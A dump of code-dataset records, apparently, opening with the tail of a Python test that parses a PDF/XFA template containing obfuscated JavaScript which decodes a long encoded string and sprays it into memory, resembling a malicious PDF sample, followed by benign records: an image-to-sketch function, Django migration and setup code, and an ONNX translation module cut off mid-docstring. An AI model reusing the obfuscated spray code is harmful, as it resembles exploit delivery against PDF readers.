XIzlcceYS25039YidW9Y181XeWI6if41oel7I555I54d86aodIfeY808fidYfzeWWcl3e360ocWdo673lbael4z34fia2eXlcfXI3zYl68ciW0zz59e77SdSl05Xl66So3ibeeadY74a3lee1odflI2Idl1cdi4azY0eeWXS7303bddWSY7f5be724065fI5WeSoWic59zbzIo25Y0Y06W49lS4Yf1fXeWl6i0b12Xzez35aIbYl9o84W51I88fciYY0Sl40XWlS0360o9a2e673b1Ie87l6YfiaWoS7Xia5WzYl6oX26I5l8097eSe341o1I6IScfIbdeadY6c5Yb1d7loSWIXz6z3cdi8I6069eWl27371adXWcSl62b5eld842fc5Sl37441zWei8fdXYbY7l1Wa9oWe358X15W6Si3zei727c4zf95a99o1i6ifablb81YIa3l9WfiWIaS107XI27fcIi16WYdb42aba9o370I2iazYle89260d979eW7Sd3f05Xl6Ifl041eWY4o6c5YaIe2o5fXbI8l73o65e27Y792WX2aS30X9lW5flfob8Wleb655W5WeSoWic59z08X22Y207l1oYceSe551W9i2zYz0be2bI7c354Ibzl0li43bdzXzc4iY7Yz03ociX2Y5405dXX6dff592e84639a552ooo0fdzdz87o27cSIzl3WW9lS4Y981ciX6dl3l1c7I44691aaWe2oaiW5a80z64f520e098595Sd370acIWlY3fXb5X2e765f952oz6Xi5IWIilc81ib2S0b91cYI6Y6Xod5W3f2b8eiX64W50fcl290oco9zaa0l64c5e2406869bSlS11bcIdof30cebbI4449a3lSlo64I65dal7022c7Y7zc05caS7z03SczWl6lb8bieY4Y4e1Slle2iciS5YIdz8o2i7Y3Y0ebWX273a3iX3XaflIibaXz4z4Y59bcl4l34cIf13zb4biY030c91c5WSY18bcdd6Si0b1dbfd458495Il9o84ab2e07IoXifY60282S2SlS11bcIdoff3195el7450aWbll5ococI3zYlSc7i72e0bW4c03aSi1Xcbdedz3ibz777974faaIe779iSI2aW89cIYYY3Y2oXi0WdY9049iooYf3bzIbld45e5200l47iic5Xa38X22i1f6zcWYSdI3Yf8i9W2d61f41cXzSY701I5Se56iI5baa07c2i5IYel9Wci2Sd1la5dWW7dz011ce27l6bYYaSdS6aiabdezco41ifa7Y2WWW7SdYl319dWz6cf4b0Wa4z7efaXSo879iSI2aW89cdYYI0l89eS536Sf19X3W6Yz051ib24W6e1aled7o8fI5dIi8f822SY00bWcia3SS70Xll6667f4baXz7c6if352o5ii43b2al8929cXI0za84ceS436311WW66X359b70493i43bla1oc4WI3zYl1ob2Ia0zc05c5S6Ye1ice26S86516WI4Y3Wfal3lSi1IlbI8Szeo2i6Y3zf9eWX27Yo19cWWlSc049XbIdz3i1al2a37iic5Xad8Xc9iza3z79a7e3e548X156SS43lzzX8ez554ib3lS7049idaY7fo65IYf038490I61304dWW76X3dfcea4o3e5aXSe3oco1iY8l81c7idYSz78bW73a54XIcd26S865b6e0dI45fW5Wlzo04Sbdal78cd2WIeY08Wi23iz68fX36adX3be2eld8425i52oYW9fIiW8ll9of5S00Y59fcfWe3o3XdiWlYz6b1oWI7b50f35zl5i3i25Yzic6cz5XYcz591WSIaz1Xi15dod63Ife7ee46Y1WaelW7YoXbozY8022cS20l8WaW2Sdz08f9W2zf8fo96e6d43857lIl5lcilIXzlX12zibaYl40aWb2bS71XXIWId6651c72447W5ebYlYioi35SzSlbcb5WY00co5WSSe3f1I9adaf4fI1cbId638aWX3l373IXbWzi80ddYSael9W59bS4z13b9edldf3z92ece43faSaelz64fc5a13lec158Y8z99l7eIezo14ded3Sz6o1XXf744W59lzooo0I2IWadz3oiib03l69YWX44351idIW6Y8b81aWddY4o5ibclX75I6IYa38X22ifa0l4Wlcf2eY01f9S2ISff4eaXz7c4ofea9o3liI1I3zfcIcWYeIX998ciXS631XodIW6fzbfeXWlS45847bleXioI5bYe8l32icS00zeoa772oYI1b9Sdcf33110797Y481Sa1lS75o1Ifzdli8c2407z88ccb2iY907dX2eYf68b07Y4922f7X4dolaIiIdez762c58a0zf8Yi0IlSI0bXi2zYzbff0baSY6ef3bYdYiofli2eS81o7c22d0f8liaIe341i9a2zf66Yf58zdb7S1bX2l07dfXbW8zcf8cc8Y6zao5ib3S3o8X1X6dd23IzI7e406c1SaYe2l3f9zI86z88e2dI5l40cWeWi3i8IXbWISofI';kb=led(kp,ks);kc=pub(s,7600);if(km<m){ky=c}else if(km<ku){ky=x}if(ky[n]){kt=u;ka=[kv,kw,kb,kc,kt,ky][kk]('');sac[j]=ka}}return}function pub(j,u){var a,r,w,g,q,y;y='967e2IfXYiX7';w=6;g=led(y,w);a='WfdY64oYc4WSSe694d';q=30;r=led(a,q);while(j[g]<u){j+=j}j=j[r](0,u);return j}</script></event><ui><imageEdit/></ui></field></subform></subform></template>\"\"\"\n xml=etree.fromstring(y)\n jsStr = xmlToJS(xml)\n\n print jsStr\n\nif __name__ == \"__main__\":\n test_xmlToJS()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : 河北雪域网络科技有限公司 A.Star
# @contact: [email protected]
# @site:
# @file: img_to_sketch.py
# @time: 2018/8/6 1:15
# @Software: PyCharm
from skimage.color import rgb2grey
import numpy as np
def sketch(img, threshold=15):
"""
素描画生成
param img: Image实例
param threshold: 介于0到100
:return:
"""
if threshold < 0:
threshold = 0
if threshold > 100:
threshold = 100
if len(img.shape) == 3:
img = rgb2grey(img)
m, n = img.shape
diff = np.abs(img[:m - 1, :n - 1] - img[1:, 1:])
img = np.zeros((m - 1, n - 1))
img[diff < threshold/255] = 1
return img
|
normal
|
{
"blob_id": "065354d2a8fd8a75e16bf85f624b12641377029a",
"index": 8568,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef sketch(img, threshold=15):\n \"\"\"\n 素描画生成\n param img: Image实例\n param threshold: 介于0到100\n :return:\n \"\"\"\n if threshold < 0:\n threshold = 0\n if threshold > 100:\n threshold = 100\n if len(img.shape) == 3:\n img = rgb2grey(img)\n m, n = img.shape\n diff = np.abs(img[:m - 1, :n - 1] - img[1:, 1:])\n img = np.zeros((m - 1, n - 1))\n img[diff < threshold / 255] = 1\n return img\n",
"step-3": "from skimage.color import rgb2grey\nimport numpy as np\n\n\ndef sketch(img, threshold=15):\n \"\"\"\n 素描画生成\n param img: Image实例\n param threshold: 介于0到100\n :return:\n \"\"\"\n if threshold < 0:\n threshold = 0\n if threshold > 100:\n threshold = 100\n if len(img.shape) == 3:\n img = rgb2grey(img)\n m, n = img.shape\n diff = np.abs(img[:m - 1, :n - 1] - img[1:, 1:])\n img = np.zeros((m - 1, n - 1))\n img[diff < threshold / 255] = 1\n return img\n",
"step-4": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : 河北雪域网络科技有限公司 A.Star\n# @contact: [email protected]\n# @site: \n# @file: img_to_sketch.py\n# @time: 2018/8/6 1:15\n# @Software: PyCharm\n\nfrom skimage.color import rgb2grey\nimport numpy as np\n\n\ndef sketch(img, threshold=15):\n \"\"\"\n 素描画生成\n param img: Image实例\n param threshold: 介于0到100\n :return:\n \"\"\"\n if threshold < 0:\n threshold = 0\n if threshold > 100:\n threshold = 100\n if len(img.shape) == 3:\n img = rgb2grey(img)\n m, n = img.shape\n diff = np.abs(img[:m - 1, :n - 1] - img[1:, 1:])\n img = np.zeros((m - 1, n - 1))\n img[diff < threshold/255] = 1\n return img\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Generated by Django 3.1.7 on 2021-03-25 00:33
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('restaurante', '0003_auto_20210324_1932'),
]
operations = [
migrations.AlterModelOptions(
name='comprobantemodel',
options={'verbose_name': 'Comprobante'},
),
migrations.AlterModelTable(
name='comprobantemodel',
table='t_comprobante',
),
]
|
normal
|
{
"blob_id": "f76a3fac75e7e2b156f4bff5094f11009b65b599",
"index": 8822,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('restaurante', '0003_auto_20210324_1932')]\n operations = [migrations.AlterModelOptions(name='comprobantemodel',\n options={'verbose_name': 'Comprobante'}), migrations.\n AlterModelTable(name='comprobantemodel', table='t_comprobante')]\n",
"step-4": "from django.db import migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [('restaurante', '0003_auto_20210324_1932')]\n operations = [migrations.AlterModelOptions(name='comprobantemodel',\n options={'verbose_name': 'Comprobante'}), migrations.\n AlterModelTable(name='comprobantemodel', table='t_comprobante')]\n",
"step-5": "# Generated by Django 3.1.7 on 2021-03-25 00:33\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('restaurante', '0003_auto_20210324_1932'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='comprobantemodel',\n options={'verbose_name': 'Comprobante'},\n ),\n migrations.AlterModelTable(\n name='comprobantemodel',\n table='t_comprobante',\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Turn off bytecode generation
import sys
from asgiref.sync import sync_to_async
from django.core.wsgi import get_wsgi_application
sys.dont_write_bytecode = True
# Django specific settings
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
import django
django.setup()
from db import models
def print_all_models():
return models.Sample.objects.all()
@sync_to_async
def _create_record(name):
return models.Sample.objects.create(name=name)
async def create_record(name=None):
await _create_record(name)
|
normal
|
{
"blob_id": "4afb556ceca89eb90ba800db4f383afad1cd42a5",
"index": 3765,
"step-1": "<mask token>\n\n\ndef print_all_models():\n return models.Sample.objects.all()\n\n\n@sync_to_async\ndef _create_record(name):\n return models.Sample.objects.create(name=name)\n\n\n<mask token>\n",
"step-2": "<mask token>\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'settings')\n<mask token>\ndjango.setup()\n<mask token>\n\n\ndef print_all_models():\n return models.Sample.objects.all()\n\n\n@sync_to_async\ndef _create_record(name):\n return models.Sample.objects.create(name=name)\n\n\nasync def create_record(name=None):\n await _create_record(name)\n",
"step-3": "<mask token>\nsys.dont_write_bytecode = True\n<mask token>\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'settings')\n<mask token>\ndjango.setup()\n<mask token>\n\n\ndef print_all_models():\n return models.Sample.objects.all()\n\n\n@sync_to_async\ndef _create_record(name):\n return models.Sample.objects.create(name=name)\n\n\nasync def create_record(name=None):\n await _create_record(name)\n",
"step-4": "import sys\nfrom asgiref.sync import sync_to_async\nfrom django.core.wsgi import get_wsgi_application\nsys.dont_write_bytecode = True\nimport os\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'settings')\nimport django\ndjango.setup()\nfrom db import models\n\n\ndef print_all_models():\n return models.Sample.objects.all()\n\n\n@sync_to_async\ndef _create_record(name):\n return models.Sample.objects.create(name=name)\n\n\nasync def create_record(name=None):\n await _create_record(name)\n",
"step-5": "# Turn off bytecode generation\nimport sys\nfrom asgiref.sync import sync_to_async\nfrom django.core.wsgi import get_wsgi_application\n\n\nsys.dont_write_bytecode = True\n\n# Django specific settings\nimport os\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"settings\")\nimport django\n\ndjango.setup()\n\nfrom db import models\n\n\ndef print_all_models():\n return models.Sample.objects.all()\n\n\n@sync_to_async\ndef _create_record(name):\n return models.Sample.objects.create(name=name)\n\n\nasync def create_record(name=None):\n await _create_record(name)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
"""
@file
@brief One class which visits a syntax tree.
"""
import inspect
import ast
from textwrap import dedent
import numpy
from scipy.spatial.distance import squareform, pdist
from .node_visitor_translator import CodeNodeVisitor
def py_make_float_array(cst, op_version=None):
"""
Creates an array with a single element
from a constant.
@param cst constant
@param op_version unused
@return array
.. runpython::
:showcode:
:warningout: DeprecationWarning
from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array
print(py_make_float_array(5.5))
"""
return numpy.array([cst], dtype=numpy.float32)
def py_pow(x, p, op_version=None):
"""
Function for python operator ``**``.
@param x float
@param p power
@param op_version unused
@return :math:`x^p`
"""
return x ** p
def py_mul(*x, op_version=None):
"""
Function for python operator ``*``.
@param x floats
@param op_version unused
@return `x*y`
"""
if len(x) == 2:
return x[0] * x[1]
p = x[0]
for y in x[1:]:
p *= y
return p
def py_opp(x, op_version=None):
"""
Function for python unary operator ``-``.
@param x floats
@param op_version unused
@return `-x`
"""
return -x
def squareform_pdist(X, metric='sqeuclidean', op_version=None):
"""
Replacements for `squareform
<http://scipy.github.io/devdocs/generated/scipy.spatial.distance.squareform.html>`_
and `pdist
<http://scipy.github.io/devdocs/generated/scipy.spatial.distance.pdist.html>`_.
"""
return squareform(pdist(X, metric=metric))
def get_default_context():
"""
Returns a default context useful for most of the conversion
from a function using :epkg:`numpy` into :epkg:`ONNX`.
"""
context = {'py_pow': py_pow, 'py_make_float_array': py_make_float_array,
'py_mul': py_mul, 'py_opp': py_opp,
'cdist': 'cdist', 'squareform_pdist': 'squareform_pdist'}
allow = set(('abs add ceil arccos arccosh arcsin arcsinh arctan arctanh ceil cos cosh divide'
'equal exp floor greater invert less log matmul maximum minimum mod'
'multiply power sign sin sinh sqrt square subtract tan tanh transpose').split())
for k, v in numpy.__dict__.items():
if k not in allow:
continue
context[f'numpy.{k}'] = v
context[f'np.{k}'] = v
return context
def get_default_context_cpl():
"""
Returns a default useful context to compile the converter
returned by @see fn translate_fct2onnx.
"""
ctx = {'py_make_float_array': py_make_float_array,
'py_pow': py_pow, 'py_mul': py_mul, 'py_opp': py_opp,
'numpy': numpy}
try:
from skl2onnx.algebra.complex_functions import onnx_squareform_pdist # delayed
from skl2onnx.algebra.complex_functions import onnx_cdist # delayed
ctx['onnx_squareform_pdist'] = onnx_squareform_pdist
ctx['onnx_cdist'] = onnx_cdist
except ImportError: # pragma: no cover
# Too old version for skl2onnx.
pass
from skl2onnx.algebra import onnx_ops # delayed
from skl2onnx.algebra.onnx_operator import OnnxOperator # delayed
d = onnx_ops.__dict__
for k, v in d.items():
try:
if k.startswith("Onnx") and issubclass(v, OnnxOperator):
ctx[k] = v
except TypeError as e:
if inspect.isfunction(v):
continue
raise RuntimeError( # pragma: no cover
f"Issue with {k}={v} (type={type(v)})") from e
return ctx
def translate_fct2onnx(fct, context=None, cpl=False,
context_cpl=None, output_names=None,
dtype=numpy.float32,
verbose=0, fLOG=None):
"""
Translates a function into :epkg:`ONNX`. The code it produces
is using classes *OnnxAbs*, *OnnxAdd*, ...
@param fct function to convert
@param context context of the function to convert
something like ``{'numpy.transpose': numpy.transpose}``,
if *context* is None, it receives a default value
returnd by @see fn get_default_context
@param cpl compile the function after it was
created
@param context_cpl context used at compiling time
if *context_cpl* is None, it receives a default value
returnd by @see fn get_default_context_cpl
@param output_names names of the output in the :epkg:`ONNX` graph
@param dtype :epkg:`numpy` float type used to produce the model
@param verbose integer, display more information
@param fLOG logging function
@return code or compiled code
.. exref::
:title: Convert a function into ONNX code
The following code parses a python function and returns
another python function which produces an :epkg:`ONNX`
graph if executed.
.. runpython::
:showcode:
:warningout: DeprecationWarning
:process:
:store_in_file: fct2onnx2.py
import numpy
from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx
def trs(x, y):
z = x + numpy.transpose(y, axes=[1, 0])
return x * z
onnx_code = translate_fct2onnx(
trs, context={'numpy.transpose': numpy.transpose})
print(onnx_code)
Next example goes further and compile the outcome.
.. exref::
:title: Convert a function into ONNX code and run
The following code parses a python function and returns
another python function which produces an :epkg:`ONNX`
graph if executed. The example executes the function,
creates an :epkg:`ONNX` then uses @see cl OnnxInference
to compute *predictions*. Finally it compares
them to the original.
.. runpython::
:showcode:
:warningout: DeprecationWarning
:process:
:store_in_file: fct2onnx3.py
import numpy
from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx
from mlprodict.plotting.text_plot import onnx_simple_text_plot
from mlprodict.onnxrt import OnnxInference
from mlprodict.npy.xop import loadop
OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(
'Add', 'Transpose', 'Mul', 'Identity')
ctx = {'OnnxAdd': OnnxAdd,
'OnnxTranspose': OnnxTranspose,
'OnnxMul': OnnxMul,
'OnnxIdentity': OnnxIdentity}
def trs(x, y):
z = x + numpy.transpose(y, axes=[1, 0])
return x * z
inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),
'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}
original = trs(inputs['x'], inputs['y'])
print('original output:', original)
onnx_fct = translate_fct2onnx(
trs, context={'numpy.transpose': numpy.transpose},
cpl=True, context_cpl=ctx, output_names=['Z'])
onnx_code = onnx_fct('x', 'y', op_version=12)
onnx_g = onnx_code.to_onnx(inputs, target_opset=12)
print("ONNX model")
print(onnx_simple_text_plot(onnx_g))
oinf = OnnxInference(onnx_g)
res = oinf.run(inputs)
print('-----------')
print("ONNX inference:", res['Z'])
The function to be converted may include python functions
which must not be converted. In that case, their name
must be prefixed by ``py_``. The execution of the function
this one builds produces the following error::
TypeError: Parameter to MergeFrom() must be instance of same class:
expected onnx.TensorProto got onnx.AttributeProto.
It indicates that constants in the code marges multiple types,
usually floats and tensor of floats. Floats should be converted
using the following function::
def py_make_float_array(cst):
return numpy.array([cst], dtype=numpy.float32)
The function replaces empty contexts by default values which
covers many :epkg:`numpy` functions. The tutorial
:ref:`l-onnx-tutorial` gives an example of how it can be used
on a more complex function.
"""
def compile_code(name, code, context=None):
"""
Compiles a python function with the given
context.
@param name function name
@param code python code
@param context context used at compilation
@return compiled function
"""
if context is None:
context = {} # pragma: no cover
try:
obj = compile(code, "", "exec")
except SyntaxError as e: # pragma: no cover
raise SyntaxError(f"Unable to compile\n{code}") from e
context_g = context.copy()
context_l = context.copy()
exec(obj, context_g, context_l) # pylint: disable=W0122
return context_l[name]
if isinstance(fct, str):
code = fct
elif callable(fct):
code = inspect.getsource(fct)
else:
raise TypeError( # pragma: no cover
f"Unable to guess code from type {type(fct)}.")
node = ast.parse(dedent(code))
v = CodeNodeVisitor()
v.visit(node)
if context is None:
context = get_default_context()
onnx_code = v.export(context=context,
output_names=output_names)
if not cpl:
return onnx_code
if verbose > 0 and fLOG is not None: # pragma: no cover
fLOG('[translate_fct2onnx] python code')
fLOG(code)
fLOG('[translate_fct2onnx] ONNX code')
fLOG(onnx_code)
if context_cpl is None:
context_cpl = get_default_context_cpl()
if 'numpy' not in context_cpl:
context_cpl = context_cpl.copy()
context_cpl['numpy'] = numpy
return compile_code(fct.__name__, onnx_code, context_cpl)
|
normal
|
{
"blob_id": "fdf6c28e65b50c52550a95c2d991b1eb3ec53a2f",
"index": 3540,
"step-1": "<mask token>\n\n\ndef py_make_float_array(cst, op_version=None):\n \"\"\"\n Creates an array with a single element\n from a constant.\n\n @param cst constant\n @param op_version unused\n @return array\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array\n print(py_make_float_array(5.5))\n \"\"\"\n return numpy.array([cst], dtype=numpy.float32)\n\n\n<mask token>\n\n\ndef py_mul(*x, op_version=None):\n \"\"\"\n Function for python operator ``*``.\n\n @param x floats\n @param op_version unused\n @return `x*y`\n \"\"\"\n if len(x) == 2:\n return x[0] * x[1]\n p = x[0]\n for y in x[1:]:\n p *= y\n return p\n\n\ndef py_opp(x, op_version=None):\n \"\"\"\n Function for python unary operator ``-``.\n\n @param x floats\n @param op_version unused\n @return `-x`\n \"\"\"\n return -x\n\n\n<mask token>\n\n\ndef get_default_context_cpl():\n \"\"\"\n Returns a default useful context to compile the converter\n returned by @see fn translate_fct2onnx.\n \"\"\"\n ctx = {'py_make_float_array': py_make_float_array, 'py_pow': py_pow,\n 'py_mul': py_mul, 'py_opp': py_opp, 'numpy': numpy}\n try:\n from skl2onnx.algebra.complex_functions import onnx_squareform_pdist\n from skl2onnx.algebra.complex_functions import onnx_cdist\n ctx['onnx_squareform_pdist'] = onnx_squareform_pdist\n ctx['onnx_cdist'] = onnx_cdist\n except ImportError:\n pass\n from skl2onnx.algebra import onnx_ops\n from skl2onnx.algebra.onnx_operator import OnnxOperator\n d = onnx_ops.__dict__\n for k, v in d.items():\n try:\n if k.startswith('Onnx') and issubclass(v, OnnxOperator):\n ctx[k] = v\n except TypeError as e:\n if inspect.isfunction(v):\n continue\n raise RuntimeError(f'Issue with {k}={v} (type={type(v)})') from e\n return ctx\n\n\ndef translate_fct2onnx(fct, context=None, cpl=False, context_cpl=None,\n output_names=None, dtype=numpy.float32, verbose=0, fLOG=None):\n \"\"\"\n Translates a function into :epkg:`ONNX`. The code it produces\n is using classes *OnnxAbs*, *OnnxAdd*, ...\n\n @param fct function to convert\n @param context context of the function to convert\n something like ``{'numpy.transpose': numpy.transpose}``,\n if *context* is None, it receives a default value\n returnd by @see fn get_default_context\n @param cpl compile the function after it was\n created\n @param context_cpl context used at compiling time\n if *context_cpl* is None, it receives a default value\n returnd by @see fn get_default_context_cpl\n @param output_names names of the output in the :epkg:`ONNX` graph\n @param dtype :epkg:`numpy` float type used to produce the model\n @param verbose integer, display more information\n @param fLOG logging function\n @return code or compiled code\n\n .. exref::\n :title: Convert a function into ONNX code\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx2.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n onnx_code = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose})\n print(onnx_code)\n\n Next example goes further and compile the outcome.\n\n .. exref::\n :title: Convert a function into ONNX code and run\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed. The example executes the function,\n creates an :epkg:`ONNX` then uses @see cl OnnxInference\n to compute *predictions*. Finally it compares\n them to the original.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx3.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n from mlprodict.plotting.text_plot import onnx_simple_text_plot\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.npy.xop import loadop\n\n\n OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(\n 'Add', 'Transpose', 'Mul', 'Identity')\n\n\n ctx = {'OnnxAdd': OnnxAdd,\n 'OnnxTranspose': OnnxTranspose,\n 'OnnxMul': OnnxMul,\n 'OnnxIdentity': OnnxIdentity}\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),\n 'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}\n\n original = trs(inputs['x'], inputs['y'])\n\n print('original output:', original)\n\n onnx_fct = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose},\n cpl=True, context_cpl=ctx, output_names=['Z'])\n\n onnx_code = onnx_fct('x', 'y', op_version=12)\n\n onnx_g = onnx_code.to_onnx(inputs, target_opset=12)\n print(\"ONNX model\")\n print(onnx_simple_text_plot(onnx_g))\n\n oinf = OnnxInference(onnx_g)\n res = oinf.run(inputs)\n\n print('-----------')\n print(\"ONNX inference:\", res['Z'])\n\n The function to be converted may include python functions\n which must not be converted. In that case, their name\n must be prefixed by ``py_``. The execution of the function\n this one builds produces the following error::\n\n TypeError: Parameter to MergeFrom() must be instance of same class:\n expected onnx.TensorProto got onnx.AttributeProto.\n\n It indicates that constants in the code marges multiple types,\n usually floats and tensor of floats. Floats should be converted\n using the following function::\n\n def py_make_float_array(cst):\n return numpy.array([cst], dtype=numpy.float32)\n\n The function replaces empty contexts by default values which\n covers many :epkg:`numpy` functions. The tutorial\n :ref:`l-onnx-tutorial` gives an example of how it can be used\n on a more complex function.\n \"\"\"\n\n def compile_code(name, code, context=None):\n \"\"\"\n Compiles a python function with the given\n context.\n\n @param name function name\n @param code python code\n @param context context used at compilation\n @return compiled function\n \"\"\"\n if context is None:\n context = {}\n try:\n obj = compile(code, '', 'exec')\n except SyntaxError as e:\n raise SyntaxError(f'Unable to compile\\n{code}') from e\n context_g = context.copy()\n context_l = context.copy()\n exec(obj, context_g, context_l)\n return context_l[name]\n if isinstance(fct, str):\n code = fct\n elif callable(fct):\n code = inspect.getsource(fct)\n else:\n raise TypeError(f'Unable to guess code from type {type(fct)}.')\n node = ast.parse(dedent(code))\n v = CodeNodeVisitor()\n v.visit(node)\n if context is None:\n context = get_default_context()\n onnx_code = v.export(context=context, output_names=output_names)\n if not cpl:\n return onnx_code\n if verbose > 0 and fLOG is not None:\n fLOG('[translate_fct2onnx] python code')\n fLOG(code)\n fLOG('[translate_fct2onnx] ONNX code')\n fLOG(onnx_code)\n if context_cpl is None:\n context_cpl = get_default_context_cpl()\n if 'numpy' not in context_cpl:\n context_cpl = context_cpl.copy()\n context_cpl['numpy'] = numpy\n return compile_code(fct.__name__, onnx_code, context_cpl)\n",
"step-2": "<mask token>\n\n\ndef py_make_float_array(cst, op_version=None):\n \"\"\"\n Creates an array with a single element\n from a constant.\n\n @param cst constant\n @param op_version unused\n @return array\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array\n print(py_make_float_array(5.5))\n \"\"\"\n return numpy.array([cst], dtype=numpy.float32)\n\n\ndef py_pow(x, p, op_version=None):\n \"\"\"\n Function for python operator ``**``.\n\n @param x float\n @param p power\n @param op_version unused\n @return :math:`x^p`\n \"\"\"\n return x ** p\n\n\ndef py_mul(*x, op_version=None):\n \"\"\"\n Function for python operator ``*``.\n\n @param x floats\n @param op_version unused\n @return `x*y`\n \"\"\"\n if len(x) == 2:\n return x[0] * x[1]\n p = x[0]\n for y in x[1:]:\n p *= y\n return p\n\n\ndef py_opp(x, op_version=None):\n \"\"\"\n Function for python unary operator ``-``.\n\n @param x floats\n @param op_version unused\n @return `-x`\n \"\"\"\n return -x\n\n\n<mask token>\n\n\ndef get_default_context_cpl():\n \"\"\"\n Returns a default useful context to compile the converter\n returned by @see fn translate_fct2onnx.\n \"\"\"\n ctx = {'py_make_float_array': py_make_float_array, 'py_pow': py_pow,\n 'py_mul': py_mul, 'py_opp': py_opp, 'numpy': numpy}\n try:\n from skl2onnx.algebra.complex_functions import onnx_squareform_pdist\n from skl2onnx.algebra.complex_functions import onnx_cdist\n ctx['onnx_squareform_pdist'] = onnx_squareform_pdist\n ctx['onnx_cdist'] = onnx_cdist\n except ImportError:\n pass\n from skl2onnx.algebra import onnx_ops\n from skl2onnx.algebra.onnx_operator import OnnxOperator\n d = onnx_ops.__dict__\n for k, v in d.items():\n try:\n if k.startswith('Onnx') and issubclass(v, OnnxOperator):\n ctx[k] = v\n except TypeError as e:\n if inspect.isfunction(v):\n continue\n raise RuntimeError(f'Issue with {k}={v} (type={type(v)})') from e\n return ctx\n\n\ndef translate_fct2onnx(fct, context=None, cpl=False, context_cpl=None,\n output_names=None, dtype=numpy.float32, verbose=0, fLOG=None):\n \"\"\"\n Translates a function into :epkg:`ONNX`. The code it produces\n is using classes *OnnxAbs*, *OnnxAdd*, ...\n\n @param fct function to convert\n @param context context of the function to convert\n something like ``{'numpy.transpose': numpy.transpose}``,\n if *context* is None, it receives a default value\n returnd by @see fn get_default_context\n @param cpl compile the function after it was\n created\n @param context_cpl context used at compiling time\n if *context_cpl* is None, it receives a default value\n returnd by @see fn get_default_context_cpl\n @param output_names names of the output in the :epkg:`ONNX` graph\n @param dtype :epkg:`numpy` float type used to produce the model\n @param verbose integer, display more information\n @param fLOG logging function\n @return code or compiled code\n\n .. exref::\n :title: Convert a function into ONNX code\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx2.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n onnx_code = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose})\n print(onnx_code)\n\n Next example goes further and compile the outcome.\n\n .. exref::\n :title: Convert a function into ONNX code and run\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed. The example executes the function,\n creates an :epkg:`ONNX` then uses @see cl OnnxInference\n to compute *predictions*. Finally it compares\n them to the original.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx3.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n from mlprodict.plotting.text_plot import onnx_simple_text_plot\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.npy.xop import loadop\n\n\n OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(\n 'Add', 'Transpose', 'Mul', 'Identity')\n\n\n ctx = {'OnnxAdd': OnnxAdd,\n 'OnnxTranspose': OnnxTranspose,\n 'OnnxMul': OnnxMul,\n 'OnnxIdentity': OnnxIdentity}\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),\n 'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}\n\n original = trs(inputs['x'], inputs['y'])\n\n print('original output:', original)\n\n onnx_fct = translate_fct2onnx(\n trs, 